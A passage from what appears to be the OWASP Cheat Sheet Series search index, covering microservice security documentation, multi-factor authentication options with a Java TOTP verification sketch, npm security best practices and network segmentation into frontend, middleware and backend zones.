"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#attack-surface-analysis","title":"Attack surface analysis","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips","title":"Implementation tips","text":"

To enumerate the microservice endpoints that need to be tested during security testing and analyzed during threat modeling, analyze the data collected under the following sections:

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#data-leakage-analysis","title":"Data leakage analysis","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_1","title":"Implementation tips","text":"

To analyze possible data leakage, analyze the data collected under the following sections:

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_1","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#applications-trust-boundaries-components-and-significant-data-flows-justification","title":"Application's trust boundaries, components, and significant data flows justification","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_2","title":"Implementation tips","text":"

To verify the documentation and justification of all the application's trust boundaries, components, and significant data flows, analyze the data collected under the following sections:

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_2","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#analysis-of-the-applications-high-level-architecture","title":"Analysis of the application's high-level architecture","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_3","title":"Implementation tips","text":"

To verify the definition and security analysis of the application's high-level architecture and all connected remote services, analyze the data collected under the following sections:

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_3","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-of-centralized-security-controls-verification","title":"Implementation of centralized security controls verification","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_4","title":"Implementation tips","text":"

To verify the implementation of centralized, simple (economy of design), vetted, secure, and reusable security controls to avoid duplicate, missing, ineffective, or insecure controls, analyze the data collected under the section "Identify and describe infrastructure services".

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_4","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#enforcement-of-the-principle-of-least-privilege","title":"Enforcement of the principle of least privilege","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_5","title":"Implementation tips","text":"

To define the minimally needed microservice permissions, analyze the data collected under the following sections:

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_5","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#sensitive-data-identification-and-classification","title":"Sensitive data identification and classification","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_6","title":"Implementation tips","text":"

To verify that all sensitive data is identified and classified into protection levels, analyze the data collected under the following sections:

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_6","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#application-components-businesssecurity-functions-verification","title":"Application components business/security functions verification","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_7","title":"Implementation tips","text":"

To verify the definition and documentation of all application components in terms of the business or security functions they provide, analyze the data collected under the following sections (parameter "Short description"):

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_7","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html","title":"Multi-Factor Authentication Cheat Sheet","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Multi-factor authentication (MFA), or two-factor authentication (2FA), is when a user is required to present more than one type of evidence in order to authenticate on a system. There are four different types of evidence (or factors) that can be used, listed in the table below:

Factor Examples Something You Know Passwords, PINs and security questions. Something You Have Hardware or software tokens, certificates, email, SMS and phone calls. Something You Are Fingerprints, facial recognition, iris scans and handprint scans. Location Source IP ranges and geolocation

It should be emphasised that requiring multiple examples of a single factor (such as needing both a password and a PIN) does not constitute MFA, although it may provide some security benefits over a simple password.

Additionally, while the following sections discuss the disadvantages and weaknesses of various different types of MFA, in many cases these are only relevant against targeted attacks. Any MFA is better than no MFA.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#advantages","title":"Advantages","text":"

The most common way that user accounts get compromised on applications is through weak, re-used or stolen passwords. Despite any technical security controls implemented on the application, users are liable to choose weak passwords, or to use the same password on different applications. As developers or system administrators, it should be assumed that users' passwords will be compromised at some point, and the system should be designed in order to defend against this.

Multi-factor authentication (MFA) is by far the best defense against the majority of password-related attacks, including brute-force, credential stuffing and password spraying, with analysis by Microsoft suggesting that it would have stopped 99.9% of account compromises.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#disadvantages","title":"Disadvantages","text":"

The biggest disadvantage of MFA is the increase in management complexity for both administrators and end users. Many less technical users may find it difficult to configure and use MFA. Additionally, there are a number of other common issues encountered:

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#quick-recommendations","title":"Quick Recommendations","text":"

Exactly when and how MFA is implemented in an application will vary based on a number of different factors, including the threat model of the application, the technical level of the users, and the level of administrative control over the users. These need to be considered on a per-application basis.

However, the following recommendations are generally appropriate for most applications, and provide an initial starting point to consider.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#implementing-mfa","title":"Implementing MFA","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#when-to-require-mfa","title":"When to Require MFA","text":"

The most important place to require MFA on an application is when the user logs in. However, depending on the functionality available, it may also be appropriate to require MFA for performing sensitive actions, such as:

If the application provides multiple ways for a user to authenticate, these should all require MFA or have other protections implemented. A commonly missed area is an application that provides a separate API that can be used to log in, or has an associated mobile application.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#improving-usability","title":"Improving Usability","text":"

Having to frequently log in with MFA creates an additional burden for users, and may cause them to disable MFA on the application. A number of mechanisms can be used to try and reduce the level of annoyance that MFA causes. However, these types of measures do decrease the security provided by MFA, so they need to be risk assessed to find a reasonable balance of security and usability for the application.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#failed-login-attempts","title":"Failed Login Attempts","text":"

When a user enters their password, but fails to authenticate using a second factor, this could mean one of two things:

There are a number of steps that should be taken when this occurs:

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#resetting-mfa","title":"Resetting MFA","text":"

One of the biggest challenges with implementing MFA is handling users who forget or lose their second factors. There are many ways this could happen, such as:

In order to prevent users from being locked out of the application, there needs to be a mechanism for them to regain access to their account if they can't use their existing MFA; however it is also crucial that this doesn't provide an attacker with a way to bypass MFA and hijack their account.

There is no definitive \"best way\" to do this, and what is appropriate will vary hugely based on the security of the application, and also the level of control over the users. Solutions that work for a corporate application where all the staff know each other are unlikely to be feasible for a publicly available application with thousands of users all over the world. Every recovery method has its own advantages and disadvantages, and these need to be evaluated in the context of the application.

Some suggestions of possible methods include:

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#something-you-know","title":"Something You Know","text":"

The most common type of authentication is based on something the user knows - typically a password. The biggest advantage of this factor is that it has very low requirements for both developers and end users, as it does not require any special hardware or integration with other services.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#passwords-and-pins","title":"Passwords and PINs","text":"

Passwords and PINs are the most common form of authentication due to the simplicity of implementing them. The Authentication Cheat Sheet has guidance on how to implement a strong password policy, and the Password Storage Cheat Sheet has guidance on how to securely store passwords.

Most multi-factor authentication systems make use of a password, as well as at least one other factor.

It should be noted that PINs, \"secret words\" and other similar type of information are all effectively the same as passwords. Using two different types of passwords does not constitute MFA.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#security-questions","title":"Security Questions","text":"

Security questions require the user to choose (or create) a number of questions that only they will know the answer to. These are effectively the same as passwords, although they are generally considered weaker. The Choosing and Using Security Questions Cheat Sheet contains further guidance on how to implement these securely.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_1","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_1","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#something-you-have","title":"Something You Have","text":"

The second factor is something that the user possesses. This could be a physical item (such as a hardware token), a digital item (such as a certificate or private key), or based on the ownership of a mobile phone, phone number, or email address (such as SMS or a software token installed on the phone, or an email with a single-use verification code).

If properly implemented then this can be significantly more difficult for a remote attacker to compromise; however it also creates an additional administrative burden on the user, as they must keep the authentication factor with them whenever they wish to use it.

The requirement to have a second factor can also limit certain types of users' ability to access a service. For example, if a user does not have access to a mobile phone, many types of MFA will not be available for them.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#hardware-otp-tokens","title":"Hardware OTP Tokens","text":"

Physical hardware OTP tokens can be used which generate constantly changing numeric codes that must be submitted when authenticating to the application. The best known of these is the RSA SecurID, which generates a six digit number that changes every 60 seconds.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_2","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_2","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#software-totp-tokens","title":"Software TOTP Tokens","text":"

A cheaper and easier alternative to hardware tokens is using software to generate Time-based One Time Password (TOTP) codes. This would typically involve the user installing a TOTP application on their mobile phone, and then scanning a QR code provided by the web application which provides the initial seed. The authenticator app then generates a six digit number every 60 seconds, in much the same way as a hardware token.

Most websites use standardized TOTP tokens, allowing the user to install any authenticator app that supports TOTP. However, a small number of applications use their own variants of this (such as Symantec), which requires the users to install a specific app in order to use the service. This should be avoided in favour of a standards-based approach.
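
For reference, a minimal sketch of how a server might verify such a code is shown below (RFC 6238 with an HMAC-SHA1 moving factor; the 30-second step and 6 digits used here are common defaults and are assumptions, not requirements of the text above):

import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import java.nio.ByteBuffer;

class Totp {
    // Generates the code for one time step (RFC 4226 dynamic truncation).
    static String codeAt(byte[] sharedSecret, long timeStep) throws Exception {
        byte[] counter = ByteBuffer.allocate(8).putLong(timeStep).array();
        Mac mac = Mac.getInstance("HmacSHA1");
        mac.init(new SecretKeySpec(sharedSecret, "HmacSHA1"));
        byte[] hash = mac.doFinal(counter);
        int offset = hash[hash.length - 1] & 0x0F;
        int binary = ((hash[offset] & 0x7F) << 24)
                | ((hash[offset + 1] & 0xFF) << 16)
                | ((hash[offset + 2] & 0xFF) << 8)
                | (hash[offset + 3] & 0xFF);
        return String.format("%06d", binary % 1_000_000);
    }

    // Accepts the previous/current/next step to tolerate small clock drift.
    static boolean verify(byte[] sharedSecret, String submittedCode) throws Exception {
        long currentStep = System.currentTimeMillis() / 1000 / 30;
        for (long step = currentStep - 1; step <= currentStep + 1; step++) {
            if (codeAt(sharedSecret, step).equals(submittedCode)) {
                return true;
            }
        }
        return false;
    }
}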

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_3","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_3","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#hardware-u2f-tokens","title":"Hardware U2F Tokens","text":"

Hardware U2F tokens communicate with the user's workstation over USB or NFC, and implement challenge-response based authentication, rather than requiring the user to manually enter a code. This would typically be done by the user pressing a button on the token, or tapping it against their NFC reader.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_4","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_4","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#certificates","title":"Certificates","text":"

Digital certificates are files that are stored on the user's device which are automatically provided alongside the user's password when authenticating. The most common type is X.509 certificates (discussed in the Transport Layer Protection Cheat Sheet), more commonly known as client certificates.

Certificates are supported by all major web browsers, and once installed require no further interaction from the user. The certificates should be linked to an individual's user account in order to prevent users from trying to authenticate against other accounts.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_5","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_5","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#smartcards","title":"Smartcards","text":"

Smartcards are credit-card size cards with a chip containing a digital certificate for the user, which is unlocked with a PIN. They are commonly used for operating system authentication, but are rarely used in web applications.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_6","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_6","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#sms-messages-and-phone-calls","title":"SMS Messages and Phone Calls","text":"

SMS messages or phone calls can be used to provide users with a single-use code that they must submit as a second factor.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_7","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_7","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#email","title":"Email","text":"

Email verification requires that the user enters a code or clicks a link sent to their email address. There is some debate as to whether email constitutes a form of MFA, because if the user does not have MFA configured on their email account, it simply requires knowledge of the user's email password (which is often the same as their application password). However, it is included here for completeness.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_8","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_8","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#something-you-are","title":"Something You Are","text":"

The final factor in the traditional view of MFA is something you are - which is one of the physical attributes of the users (often called biometrics). Biometrics are rarely used in web applications due to the requirement for users to have specific hardware.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#biometrics","title":"Biometrics","text":"

There are a number of common types of biometrics that are used, including:

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_9","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_9","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#location","title":"Location","text":"

The use of location as a fourth factor for MFA is not fully accepted; however, it is increasingly being used for authentication. It is sometimes argued that location is only used when deciding whether or not to require MFA (as discussed above); however, this is effectively the same as considering it to be a factor in its own right. Two prominent examples of this are the Conditional Access Policies available in Microsoft Azure, and the Network Unlock functionality in BitLocker.

When talking about location, access to the application that the user is authenticating against is not usually considered (as this would always be the case, and as such is relatively meaningless).

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#source-ip-ranges","title":"Source IP Ranges","text":"

The source IP address the user is connecting from can be used as a factor, typically in an allow-list based approach. This could either be based on a static list (such as corporate office ranges) or a dynamic list (such as previous IP addresses the user has authenticated from).

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_10","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_10","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#geolocation","title":"Geolocation","text":"

Rather than using the exact IP address of the user, the geographic location that the IP address is registered to can be used. This is less precise, but may be more feasible to implement in environments where IP addresses are not static. A common usage would be to require additional authentication factors when an authentication attempt is made from outside of the user's normal country.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_11","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_11","title":"Cons","text":""},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html","title":"NPM Security best practices","text":"

In the following npm cheatsheet, we're going to focus on 10 npm security best practices and productivity tips, useful for JavaScript and Node.js developers.

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#1-avoid-publishing-secrets-to-the-npm-registry","title":"1) Avoid publishing secrets to the npm registry","text":"

Whether you're making use of API keys, passwords or other secrets, they can very easily end up leaking into source control or even a published package on the public npm registry. You may have secrets in your working directory in designated files such as a .env file, which should be added to a .gitignore to avoid committing it to a SCM, but what happens when you publish an npm package from the project's directory?

The npm CLI packs up a project into a tar archive (tarball) in order to push it to the registry. The following criteria determine which files and directories are added to the tarball:

Developers may end up updating the .gitignore file, but forget to update .npmignore as well, which can lead to a potentially sensitive file not being pushed to source control, but still being included in the npm package.

Another good practice to adopt is making use of the files property in package.json, which works as a whitelist and specifies the array of files to be included in the package that is to be created and installed (while the ignore file functions as a blacklist). The files property and an ignore file can both be used together to determine which files should explicitly be included, as well as excluded, from the package. When using both, the files property in package.json takes precedence over the ignore file.

When a package is published, the npm CLI will verbosely display the archive being created. To be extra careful, add a --dry-run command-line argument to your publish command in order to first review how the tarball is created without actually publishing it to the registry.

In January 2019, npm shared on their blog that they added a mechanism that automatically revokes a token if they detect that one has been published with a package.

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#2-enforce-the-lockfile","title":"2) Enforce the lockfile","text":"

We embraced the birth of package lockfiles with open arms, which introduced deterministic installations across different environments, and enforced dependency expectations across team collaboration. Life is good! Or so I thought... what would have happened had I slipped a change into the project's package.json file but had forgotten to commit the lockfile alongside it?

Both Yarn and npm act the same during dependency installation. When they detect an inconsistency between the project's package.json and the lockfile, they compensate for the change based on the package.json manifest by installing different versions than those that were recorded in the lockfile.

This kind of situation can be hazardous for build and production environments as they could pull in unintended package versions and render the entire benefit of a lockfile futile.

Luckily, there is a way to tell both Yarn and npm to adhere to a specified set of dependencies and their versions by referencing them from the lockfile. Any inconsistency will abort the installation. The command-line should read as follows:

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#3-minimize-attack-surfaces-by-ignoring-run-scripts","title":"3) Minimize attack surfaces by ignoring run-scripts","text":"

The npm CLI works with package run-scripts. If you've ever run npm start or npm test then you've used package run-scripts too. The npm CLI builds on scripts that a package can declare, and allows packages to define scripts to run at specific entry points during the package's installation in a project. For example, some of these script hook entries may be postinstall scripts that a package that is being installed will execute in order to perform housekeeping chores.

With this capability, bad actors may create or alter packages to perform malicious acts by running any arbitrary command when their package is installed. A couple of cases where we've already seen this happening are the popular eslint-scope incident that harvested npm tokens, and the crossenv incident, along with 36 other packages that abused a typosquatting attack on the npm registry.

Apply these npm security best practices in order to minimize the malicious module attack surface:

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#4-assess-npm-project-health","title":"4) Assess npm project health","text":""},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#npm-outdated-command","title":"npm outdated command","text":"

Rushing to constantly upgrade dependencies to their latest releases is not necessarily a good practice if it is done without reviewing release notes, the code changes, and generally testing new upgrades in a comprehensive manner. With that said, staying out of date and not upgrading at all, or after a long time, is a source for trouble as well.

The npm CLI can provide information about the freshness of the dependencies you use with regard to their semantic versioning offset. By running npm outdated, you can see which packages are out of date. Dependencies in yellow correspond to the semantic versioning as specified in the package.json manifest, and dependencies colored in red mean that there's an update available. Furthermore, the output also shows the latest version for each dependency.

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#npm-doctor-command","title":"npm doctor command","text":"

Between the variety of Node.js package managers, and different versions of Node.js you may have installed in your path, how do you verify a healthy npm installation and working environment? Whether you\u2019re working with the npm CLI in a development environment or within a CI, it is important to assess that everything is working as expected.

Call the doctor! The npm CLI incorporates a health assessment tool to diagnose your environment for a well-working npm interaction. Run npm doctor to review your npm setup:
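For example (the exact set of checks printed depends on your npm version, so treat this as a sketch):

$ npm doctor
# typically verifies connectivity to the registry (npm ping), the installed
# node and npm versions, that git is available on the PATH, permissions on
# the cache and global folders, and the integrity of cached packages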

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#5-audit-for-vulnerabilities-in-open-source-dependencies","title":"5) Audit for vulnerabilities in open source dependencies","text":"

The npm ecosystem is the single largest repository of application libraries among all language ecosystems. The registry and the libraries in it are at the core of the JavaScript developer experience, as developers can leverage work that others have already built and incorporate it into their codebase. That said, the increasing adoption of open source libraries in applications brings with it an increased risk of introducing security vulnerabilities.

Many popular npm packages have been found to be vulnerable and may carry a significant risk without proper security auditing of your project\u2019s dependencies. Some examples are npm request, superagent, mongoose, and even security-related packages like jsonwebtoken, and validator.

Security doesn't end with scanning for vulnerabilities when installing a package; it should also be streamlined into developer workflows so that it is effectively adopted throughout the entire software development lifecycle, and monitored continuously once code is deployed:
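At a minimum, the npm CLI itself can report known vulnerabilities in the installed dependency tree; the fix step below is a suggestion and its changes should be reviewed:

$ npm audit
# attempt automatic, semver-compatible upgrades of vulnerable packages
$ npm audit fix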

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#6-use-a-local-npm-proxy","title":"6) Use a local npm proxy","text":"

The npm registry is the biggest collection of packages available to all JavaScript developers and is also home to most of the open source projects for web developers. But sometimes you might have different needs in terms of security, deployments or performance. When this is true, npm allows you to switch to a different registry:

When you run npm install, it automatically starts a communication with the main registry to resolve all your dependencies; if you wish to use a different registry, that too is pretty straightforward:
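For example (the registry URL below is only a placeholder for your own mirror or private registry):

# switch the default registry for this user
$ npm config set registry https://registry.example.internal/
# or override it for a single installation
$ npm install --registry=https://registry.example.internal/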

Verdaccio is a simple, lightweight, zero-config-required private registry, and installing it is as simple as: $ npm install --global verdaccio.
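Once Verdaccio is running (by default it listens on localhost:4873, assuming the stock configuration), you can point the npm client at it:

$ npm config set registry http://localhost:4873/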

Hosting your own registry was never so easy! Let\u2019s check the most important features of this tool:

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#7-responsibly-disclose-security-vulnerabilities","title":"7) Responsibly disclose security vulnerabilities","text":"

When security vulnerabilities are found, they pose a potentially serious threat if publicly disclosed without prior warning or appropriate mitigation available for users to protect themselves.

It is recommended that security researchers follow a responsible disclosure program, which is a set of processes and guidelines that aims to connect the researchers with the vendor or maintainer of the vulnerable asset, in order to convey the vulnerability, its impact and applicability. Once the vulnerability is correctly triaged, the vendor and researcher coordinate a fix and a publication date for the vulnerability in an effort to provide an upgrade path or remediation for affected users before the security issue is made public.

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#8-enable-2fa","title":"8) Enable 2FA","text":"

In October 2017, npm officially announced support for two-factor authentication (2FA) for developers using the npm registry to host their closed and open source packages.

Even though 2FA has been supported on the npm registry for a while now, it seems to have been adopted slowly, one example being the eslint-scope incident in mid-2018, when a stolen developer account on the ESLint team led to a malicious version of eslint-scope being published by bad actors.

Enabling 2FA is an easy and significant win for npm security best practices. The registry supports two modes for enabling 2FA on a user's account:

Equip yourself with an authenticator application, such as Google Authenticator, which you can install on a mobile device, and you're ready to get started. One easy way to get started with the extended 2FA protection for your account is through npm's user interface, which allows enabling it very easily. If you're a command-line person, it's also easy to enable 2FA when using a supported npm client version (>=5.5.1):

npm profile enable-2fa auth-and-writes\n

Follow the command-line instructions to enable 2FA, and to save emergency authentication codes. If you wish to enable 2FA mode for login and profile changes only, you may replace the auth-and-writes with auth-only in the code as it appears above.
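In other words:

npm profile enable-2fa auth-only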

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#9-use-npm-author-tokens","title":"9) Use npm author tokens","text":"

Every time you log in with the npm CLI, a token is generated for your user and authenticates you to the npm registry. Tokens make it easy to perform npm registry-related actions during CI and automated procedures, such as accessing private modules on the registry or publishing new versions from a build step.

Tokens can be managed through the npm registry website, as well as using the npm command-line client. An example of using the CLI to create a read-only token that is restricted to a specific IPv4 address range is as follows:

npm token create --read-only --cidr=192.0.2.0/24\n

To verify which tokens are created for your user or to revoke tokens in cases of emergency, you can use npm token list or npm token revoke respectively.
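For example (the token identifier below is a placeholder taken from the npm token list output):

$ npm token list
$ npm token revoke <token_id>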

Ensure you are following this npm security best practice by protecting and minimizing the exposure of your npm tokens.

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#10-understand-module-naming-conventions-and-typosquatting-attacks","title":"10) Understand module naming conventions and typosquatting attacks","text":"

Naming a module is the first thing you might do when creating a package, but before you settle on a final name, note that npm enforces some rules that a package name must follow:

Typosquatting is an attack that relies on mistakes made by users, such as typos. With typosquatting, bad actors could publish malicious modules to the npm registry with names that look much like existing popular modules.

We have been tracking tens of malicious packages in the npm ecosystem; they have been seen on the PyPI Python registry as well. Perhaps some of the most popular incidents have been those of cross-env, event-stream, and eslint-scope.

One of the main targets of typosquatting attacks is user credentials, since any package has access to environment variables via the global variable process.env. Other examples we've seen in the past include the case of event-stream, where the attack targeted developers in the hope of injecting malicious code into an application's source code.

Closing our list of ten npm security best practices are the following tips to reduce the risk of such attacks:
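One practical habit that supports these tips (an illustration on our part, not part of the original list) is to review a package's metadata before installing it, so an unexpected name, maintainer or repository stands out:

$ npm view some-package name version maintainers repository

Here some-package is just a placeholder for the module you are about to install.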

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html","title":"Network segmentation Cheat Sheet","text":""},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Network segmentation is the core of multi-layer defense in depth for modern services. Segmentation slows down an attacker by preventing attacks such as:

The main goal of this cheat sheet is to show the basics of network segmentation to effectively counter attacks by building a secure and maximally isolated service network architecture.

Segmentation will avoid the following situations:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#content","title":"Content","text":""},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#schematic-symbols","title":"Schematic symbols","text":"

Elements used in network diagrams:

Crossing the border of the rectangle means crossing the firewall:

In the image above, traffic passes through two firewalls named FW1 and FW2.

In the image above, traffic passes through one firewall, behind which there are two VLANs.

To avoid overloading the diagrams, the schemes that follow do not contain firewall icons.

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#three-layer-network-architecture","title":"Three-layer network architecture","text":"

By default, an information system under development should consist of at least three components (security zones):

  1. FRONTEND;
  2. MIDDLEWARE;
  3. BACKEND.
"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#frontend","title":"FRONTEND","text":"

FRONTEND - A frontend is a set of segments with the following network elements:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#middleware","title":"MIDDLEWARE","text":"

MIDDLEWARE - a set of segments to accommodate the following network elements:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#backend","title":"BACKEND","text":"

BACKEND - a set of network segments to accommodate the following network elements:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#example-of-three-layer-network-architecture","title":"Example of Three-layer network architecture","text":"

The following example shows an organization's local network. The organization is called "Contoso".

The edge firewall contains 2 VLANs of the FRONTEND security zone:

The internal firewall contains 4 VLANs:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#interservice-interaction","title":"Interservice interaction","text":"

Usually some of a company's information systems interact with each other. It is important to define a firewall policy for such interactions. The baseline allowed interactions are indicated by the green arrows in the image below. The image above also shows the allowed access from the FRONTEND and MIDDLEWARE segments to external networks (the Internet, for example).

From this image, it follows that:

  1. Access between FRONTEND and MIDDLEWARE segments of different information systems is prohibited;
  2. Access from the MIDDLEWARE segment to the BACKEND segment of another service is prohibited (access to a foreign database bypassing the application server is prohibited).

Forbidden accesses are indicated by red arrows in the image below:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#many-applications-on-the-same-network","title":"Many applications on the same network","text":"

If you prefer to have fewer networks in your organization and to host more applications on each network, it is acceptable to host a load balancer on those networks. This balancer will distribute traffic to the applications on the network. In this case, only one port needs to be opened to such a network, and balancing will be performed, for example, based on HTTP request parameters. An example of such segmentation:

As you can see, there is only one incoming access to each network: access is opened only up to the balancer in the network. However, in this case segmentation no longer works; access control between applications from different network segments is performed at layer 7 of the OSI model by the balancer.

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#network-security-policy","title":"Network security policy","text":"

The organization must define a "paper" policy that describes firewall rules and the basic allowed network access. Such a policy is useful, at a minimum, for:

It is convenient when the policy is described with diagrams like the ones above, presenting the information as concisely and simply as possible.

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#examples-of-individual-policy-provisions","title":"Examples of individual policy provisions","text":"

Examples in the network policy will help colleagues quickly understand what access is potentially allowed and can be requested.

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#permissions-for-cicd","title":"Permissions for CI/CD","text":"

The network security policy may define, for example, the basic permissions allowed for the software development system. Let's look at an example of what such a policy might look like:

